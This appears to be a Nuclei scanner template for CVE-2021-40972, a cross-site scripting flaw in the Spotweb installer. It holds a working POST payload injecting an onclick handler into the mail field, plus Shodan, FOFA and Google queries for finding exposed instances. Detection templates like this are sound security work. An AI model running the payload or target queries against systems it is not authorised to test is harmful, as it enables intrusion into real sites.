63 lines
2.1 KiB
YAML
63 lines
2.1 KiB
YAML
id: CVE-2021-40972
|
|
|
|
info:
|
|
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
|
|
remediation: Fixed in version 1.5.2
|
|
reference:
|
|
- https://github.com/spotweb/spotweb/
|
|
- https://github.com/spotweb/spotweb/issues/711
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-40972
|
|
- https://github.com/spotweb/spotweb
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-40972
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00152
|
|
epss-percentile: 0.50482
|
|
cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: spotweb_project
|
|
product: spotweb
|
|
shodan-query:
|
|
- title:"SpotWeb - overview"
|
|
- http.title:"spotweb - overview"
|
|
fofa-query: title="spotweb - overview"
|
|
google-query: intitle:"spotweb - overview"
|
|
tags: cve,cve2021,xss,spotweb,spotweb_project
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /install.php?page=4 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
settingsform[mail]=pdteam'+onclick='alert(document.domain)
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "onclick='alert(document.domain)"
|
|
- "Spotweb"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220452459bdae0b91da1a10bcfdd4d4162c8c0b19a10a97ae7a3a38361f2b932add022100ea1aade94fa3178ba6e8a4a5aaf770f1c7b699bc9257d11bf2de9400cd3eb150:922c64590222798bb761d5b6d8e72950 |